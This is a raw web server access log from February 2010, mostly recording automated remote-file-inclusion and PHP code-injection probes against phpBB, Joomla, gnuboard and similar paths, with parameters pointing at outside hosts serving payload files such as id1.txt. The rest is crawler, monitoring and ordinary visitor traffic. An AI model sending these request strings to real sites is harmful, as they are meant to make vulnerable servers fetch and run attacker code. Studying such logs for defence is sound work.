208.87.240.120 - - [15/Feb/2010:00:19:25 -0500] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:19:43 -0500] "GET ///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:19:43 -0500] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:19:44 -0500] "GET /logs/access_log.Q110020600%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:20:19 -0500] "GET /logs/access_log.Q109051000%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:00:20:48 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:00:20:48 -0500] "GET /logs/access_log.Q109110300%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:00:20:48 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:00:20:52 -0500] "GET /logs/access_log.Q109090400%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
220.181.7.84 - - [15/Feb/2010:00:21:16 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.125 - - [15/Feb/2010:00:21:20 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.68.151 - - [15/Feb/2010:00:21:25 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0148AA5B695257003A1D00B+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.124.149.168 - - [15/Feb/2010:00:21:55 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:00:21:55 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:00:21:55 -0500] "GET /logs/access_log.Q109110300%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
203.124.149.168 - - [15/Feb/2010:00:22:07 -0500] "GET /logs/access_log.Q109090400%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:00:24:15 -0500] "GET /logs/access_log.Q109110300//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:00:24:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.6.218.57 - - [15/Feb/2010:00:24:23 -0500] "GET /logs/access_log.Q109090400//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.28.110.99 - - [15/Feb/2010:00:24:34 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.28.110.99 - - [15/Feb/2010:00:24:34 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.28.110.99 - - [15/Feb/2010:00:24:37 -0500] "GET /logs/access_log.Q109110300%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
201.28.110.99 - - [15/Feb/2010:00:24:46 -0500] "GET /logs/access_log.Q109090400%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:25:03 -0500] "GET ///index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:25:03 -0500] "GET /logs/access_log.Q110020300%20%20///index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:25:03 -0500] "GET /logs///index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:00:25:12 -0500] "GET /logs/access_log.Q108061700 HTTP/1.1" 404 224 "-" "Yandex/1.01.001 (compatible; Win16; I)"
98.112.181.250 - - [15/Feb/2010:00:25:32 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MSN Optimized;US; .NET CLR 2.0.50727; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS; MSN 9.0;MSN 9.1"
98.112.181.250 - - [15/Feb/2010:00:25:32 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MSN Optimized;US; .NET CLR 2.0.50727; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS; MSN 9.0;MSN 9.1"
98.112.181.250 - - [15/Feb/2010:00:25:34 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MSN Optimized;US; .NET CLR 2.0.50727; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS; MSN 9.0;MSN 9.1"
98.112.181.250 - - [15/Feb/2010:00:25:34 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MSN Optimized;US; .NET CLR 2.0.50727; Zune 3.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS; MSN 9.0;MSN 9.1"
115.93.146.76 - - [15/Feb/2010:00:26:20 -0500] "GET /logs/access_log.Q110012700%20%20///index.php?option=com_sef&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:27:51 -0500] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:27:51 -0500] "GET /logs/access_log.Q110020200%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:27:51 -0500] "GET /logs/access_log.Q110012600%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:27:51 -0500] "GET //gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:28:05 -0500] "GET //gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:28:05 -0500] "GET /logs/access_log.Q110020200%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:28:05 -0500] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:28:05 -0500] "GET /logs/access_log.Q110012600%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.34.19 - - [15/Feb/2010:00:28:15 -0500] "GET //include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.38.34.19 - - [15/Feb/2010:00:28:15 -0500] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.38.34.19 - - [15/Feb/2010:00:28:15 -0500] "GET /logs/access_log.Q109101600//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.38.34.19 - - [15/Feb/2010:00:28:23 -0500] "GET /logs/access_log.Q109080900//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.219.195.66 - - [15/Feb/2010:00:29:38 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.219.195.66 - - [15/Feb/2010:00:29:38 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.219.195.66 - - [15/Feb/2010:00:29:38 -0500] "GET //index.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:31:45 -0500] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:31:45 -0500] "GET /logs/access_log.Q109062700/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:31:45 -0500] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:31:52 -0500] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:31:52 -0500] "GET /logs/access_log.Q109062700/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:31:52 -0500] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:00:32:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.6.233 - - [15/Feb/2010:00:32:47 -0500] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:32:47 -0500] "GET /logs/access_log.Q110012600%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:32:47 -0500] "GET //gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.250.198 - - [15/Feb/2010:00:33:29 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:33:32 -0500] "GET /logs/access_log.Q110020700%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.106.250.198 - - [15/Feb/2010:00:33:33 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.250.198 - - [15/Feb/2010:00:33:34 -0500] "GET /logs/access_log.Q110020700%20%20//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:34:53 -0500] "GET /logs/access_log.Q110020700%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:34:53 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:34:53 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.28.110.99 - - [15/Feb/2010:00:35:20 -0500] "GET /logs/access_log.Q109110300//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.28.110.99 - - [15/Feb/2010:00:35:20 -0500] "GET /logs/access_log.Q109090400//modules/TotalCalendar/about.php?inc_dir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:35:21 -0500] "GET //bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:35:21 -0500] "GET /logs//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:35:21 -0500] "GET /logs/access_log.Q110020700%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.106.250.198 - - [15/Feb/2010:00:35:25 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:36:10 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:00:36:05 -0500] "GET /logs/error_log.Q110020800 HTTP/1.1" 200 3522227 "-" "Yandex/1.01.001 (compatible; Win16; I)"
222.239.227.209 - - [15/Feb/2010:00:36:27 -0500] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:36:27 -0500] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:36:27 -0500] "GET /logs/access_log.Q109062700/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:00:36:32 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:36:49 -0500] "GET /head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:36:49 -0500] "GET /logs/access_log.Q109062700/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:36:49 -0500] "GET /logs/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:37:08 -0500] "GET ///index.php?option=com_virtuemart&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:37:08 -0500] "GET /logs///index.php?option=com_virtuemart&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:37:08 -0500] "GET /logs/access_log.Q109121300%20%20///index.php?option=com_virtuemart&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:37:32 -0500] "GET /logs/access_log.Q109122700/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:00:37:14 -0500] "GET /logs/error_log.Q109072200 HTTP/1.0" 200 2561190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
115.93.146.76 - - [15/Feb/2010:00:37:38 -0500] "GET ///index.php?option=com_virtuemart&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:37:38 -0500] "GET /logs///index.php?option=com_virtuemart&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
115.93.146.76 - - [15/Feb/2010:00:37:38 -0500] "GET /logs/access_log.Q109121300%20%20///index.php?option=com_virtuemart&mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.227.209 - - [15/Feb/2010:00:37:56 -0500] "GET /logs/access_log.Q109122700/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:39:45 -0500] "GET //gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:39:45 -0500] "GET /logs/access_log.Q110012600%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:39:45 -0500] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:00:40:18 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.6.233 - - [15/Feb/2010:00:40:23 -0500] "GET /logs/access_log.Q110020700%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:40:54 -0500] "GET //gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:40:54 -0500] "GET /logs//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:40:54 -0500] "GET /logs/access_log.Q110012600%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.205.6.233 - - [15/Feb/2010:00:41:45 -0500] "GET /logs/access_log.Q110020700%20%20//gnuboard4/bbs//delete_comment.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:13 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:13 -0500] "GET /logs/access_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:13 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:16 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:16 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:00:42:21 -0500] "GET /logs//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:00:42:21 -0500] "GET /logs/access_log.Q109121400%20%20//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:00:42:21 -0500] "GET //mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:00:42:22 -0500] "GET /logs/access_log.Q109121300/errors.php?error=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:00:42:24 -0500] "GET /errors.php?error=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:00:42:24 -0500] "GET /logs/errors.php?error=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:43 -0500] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:42:48 -0500] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:00:42:53 -0500] "GET /logs//salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:00:42:53 -0500] "GET //salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:00:42:54 -0500] "GET /logs/access_log.Q110020800//salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:43:04 -0500] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
204.12.11.202 - - [15/Feb/2010:00:43:48 -0500] "GET /logs/access_log.Q110011600%20%20//mcf.php?content=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.188.161.93 - - [15/Feb/2010:00:44:23 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L8277085D8A0517009BB202X+M37+ENG HTTP/1.1" 200 74223 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L827708568F55670074B202X+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"
75.125.84.226 - - [15/Feb/2010:00:44:28 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:44:28 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:44:28 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:44:37 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:44:37 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:00:44:37 -0500] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://musicadelibreria.net/footer?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.125.84.226 - - [15/Feb/2010:00:44:44 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
